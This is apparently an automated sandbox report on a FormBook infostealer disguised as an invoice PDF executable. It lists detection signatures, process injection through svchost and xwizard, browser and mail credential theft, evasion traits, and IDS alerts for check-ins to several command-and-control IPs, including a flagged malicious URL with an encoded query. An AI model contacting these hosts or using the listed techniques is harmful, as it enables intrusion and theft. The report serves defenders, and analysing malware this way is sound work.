Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Outstanding Invoices Spreadsheet Scan 00495_PDF.exe

Overview

General Information

Sample name:Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
Analysis ID:1572490
MD5:809f3ed91d34d38f0eced2a0709e22e9
SHA1:08eddcdbf872273fffd90569024c74d99da2c6bd
SHA256:494b4e888e21a6d9545fb434442900723eae53eb99882dfaa5f30367bf37d4c5
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Outstanding Invoices Spreadsheet Scan 00495_PDF.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe" MD5: 809F3ED91D34D38F0ECED2A0709E22E9)
    • svchost.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fQbMdgFgKkVEm.exe (PID: 1400 cmdline: "C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 7680 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • firefox.exe (PID: 7864 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe" , ParentImage: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe, ParentProcessId: 1400, ParentProcessName: fQbMdgFgKkVEm.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 7680, ProcessName: xwizard.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ParentImage: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ParentProcessId: 7328, ParentProcessName: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ProcessId: 7388, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ParentImage: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ParentProcessId: 7328, ParentProcessName: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ProcessId: 7388, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T16:23:49.467410+010020507451Malware Command and Control Activity Detected192.168.2.5497573.33.130.19080TCP
                2024-12-10T16:24:09.611947+010020507451Malware Command and Control Activity Detected192.168.2.549816180.178.39.23680TCP
                2024-12-10T16:24:24.436750+010020507451Malware Command and Control Activity Detected192.168.2.549854203.161.49.19380TCP
                2024-12-10T16:24:39.938824+010020507451Malware Command and Control Activity Detected192.168.2.549894217.160.0.13280TCP
                2024-12-10T16:24:55.167018+010020507451Malware Command and Control Activity Detected192.168.2.549934216.40.34.4180TCP
                2024-12-10T16:25:19.189090+010020507451Malware Command and Control Activity Detected192.168.2.5499683.33.130.19080TCP
                2024-12-10T16:25:40.784275+010020507451Malware Command and Control Activity Detected192.168.2.54999846.38.243.23480TCP
                2024-12-10T16:25:56.550295+010020507451Malware Command and Control Activity Detected192.168.2.55000274.48.34.4380TCP
                2024-12-10T16:26:12.510591+010020507451Malware Command and Control Activity Detected192.168.2.55000623.167.152.4180TCP
                2024-12-10T16:26:32.876349+010020507451Malware Command and Control Activity Detected192.168.2.550010178.79.184.19680TCP
                2024-12-10T16:26:48.335378+010020507451Malware Command and Control Activity Detected192.168.2.55001445.79.252.9480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T16:23:49.467410+010028554651A Network Trojan was detected192.168.2.5497573.33.130.19080TCP
                2024-12-10T16:24:09.611947+010028554651A Network Trojan was detected192.168.2.549816180.178.39.23680TCP
                2024-12-10T16:24:24.436750+010028554651A Network Trojan was detected192.168.2.549854203.161.49.19380TCP
                2024-12-10T16:24:39.938824+010028554651A Network Trojan was detected192.168.2.549894217.160.0.13280TCP
                2024-12-10T16:24:55.167018+010028554651A Network Trojan was detected192.168.2.549934216.40.34.4180TCP
                2024-12-10T16:25:19.189090+010028554651A Network Trojan was detected192.168.2.5499683.33.130.19080TCP
                2024-12-10T16:25:40.784275+010028554651A Network Trojan was detected192.168.2.54999846.38.243.23480TCP
                2024-12-10T16:25:56.550295+010028554651A Network Trojan was detected192.168.2.55000274.48.34.4380TCP
                2024-12-10T16:26:12.510591+010028554651A Network Trojan was detected192.168.2.55000623.167.152.4180TCP
                2024-12-10T16:26:32.876349+010028554651A Network Trojan was detected192.168.2.550010178.79.184.19680TCP
                2024-12-10T16:26:48.335378+010028554651A Network Trojan was detected192.168.2.55001445.79.252.9480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T16:24:01.517330+010028554641A Network Trojan was detected192.168.2.549796180.178.39.23680TCP
                2024-12-10T16:24:04.236517+010028554641A Network Trojan was detected192.168.2.549802180.178.39.23680TCP
                2024-12-10T16:24:06.935287+010028554641A Network Trojan was detected192.168.2.549808180.178.39.23680TCP
                2024-12-10T16:24:16.446620+010028554641A Network Trojan was detected192.168.2.549833203.161.49.19380TCP
                2024-12-10T16:24:19.126391+010028554641A Network Trojan was detected192.168.2.549839203.161.49.19380TCP
                2024-12-10T16:24:21.845643+010028554641A Network Trojan was detected192.168.2.549845203.161.49.19380TCP
                2024-12-10T16:24:31.925227+010028554641A Network Trojan was detected192.168.2.549872217.160.0.13280TCP
                2024-12-10T16:24:34.584290+010028554641A Network Trojan was detected192.168.2.549878217.160.0.13280TCP
                2024-12-10T16:24:37.361408+010028554641A Network Trojan was detected192.168.2.549884217.160.0.13280TCP
                2024-12-10T16:24:47.192472+010028554641A Network Trojan was detected192.168.2.549911216.40.34.4180TCP
                2024-12-10T16:24:49.853751+010028554641A Network Trojan was detected192.168.2.549917216.40.34.4180TCP
                2024-12-10T16:24:52.581039+010028554641A Network Trojan was detected192.168.2.549923216.40.34.4180TCP
                2024-12-10T16:25:02.442109+010028554641A Network Trojan was detected192.168.2.5499453.33.130.19080TCP
                2024-12-10T16:25:04.697169+010028554641A Network Trojan was detected192.168.2.5499553.33.130.19080TCP
                2024-12-10T16:25:07.348123+010028554641A Network Trojan was detected192.168.2.5499613.33.130.19080TCP
                2024-12-10T16:25:26.302171+010028554641A Network Trojan was detected192.168.2.54999546.38.243.23480TCP
                2024-12-10T16:25:28.958390+010028554641A Network Trojan was detected192.168.2.54999646.38.243.23480TCP
                2024-12-10T16:25:31.613836+010028554641A Network Trojan was detected192.168.2.54999746.38.243.23480TCP
                2024-12-10T16:25:48.568365+010028554641A Network Trojan was detected192.168.2.54999974.48.34.4380TCP
                2024-12-10T16:25:51.223207+010028554641A Network Trojan was detected192.168.2.55000074.48.34.4380TCP
                2024-12-10T16:25:53.879832+010028554641A Network Trojan was detected192.168.2.55000174.48.34.4380TCP
                2024-12-10T16:26:04.340359+010028554641A Network Trojan was detected192.168.2.55000323.167.152.4180TCP
                2024-12-10T16:26:06.996278+010028554641A Network Trojan was detected192.168.2.55000423.167.152.4180TCP
                2024-12-10T16:26:09.658023+010028554641A Network Trojan was detected192.168.2.55000523.167.152.4180TCP
                2024-12-10T16:26:19.926376+010028554641A Network Trojan was detected192.168.2.550007178.79.184.19680TCP
                2024-12-10T16:26:22.600329+010028554641A Network Trojan was detected192.168.2.550008178.79.184.19680TCP
                2024-12-10T16:26:25.254544+010028554641A Network Trojan was detected192.168.2.550009178.79.184.19680TCP
                2024-12-10T16:26:40.406312+010028554641A Network Trojan was detected192.168.2.55001145.79.252.9480TCP
                2024-12-10T16:26:43.018497+010028554641A Network Trojan was detected192.168.2.55001245.79.252.9480TCP
                2024-12-10T16:26:45.676025+010028554641A Network Trojan was detected192.168.2.55001345.79.252.9480TCP
                2024-12-10T16:27:03.926117+010028554641A Network Trojan was detected192.168.2.55001531.31.198.14580TCP
                2024-12-10T16:27:07.551628+010028554641A Network Trojan was detected192.168.2.55001631.31.198.14580TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.bioart.buzz/uwg4/Avira URL Cloud: Label: malware
                Source: http://www.bioart.buzz/uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBdAvira URL Cloud: Label: malware
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeReversingLabs: Detection: 39%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeJoe Sandbox ML: detected
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000000.2274863523.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301C840 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C840
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4x nop then pop edi4_2_064D8B1C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4x nop then xor eax, eax4_2_064DC31F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then xor eax, eax5_2_03009E90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then mov ebx, 00000004h5_2_04DB04E1

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49816 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49816 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49833 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49808 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49757 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49757 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49878 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49884 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49872 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49802 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49894 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49894 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49911 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49845 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49961 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49945 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49968 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49968 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49796 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 23.167.152.41:80
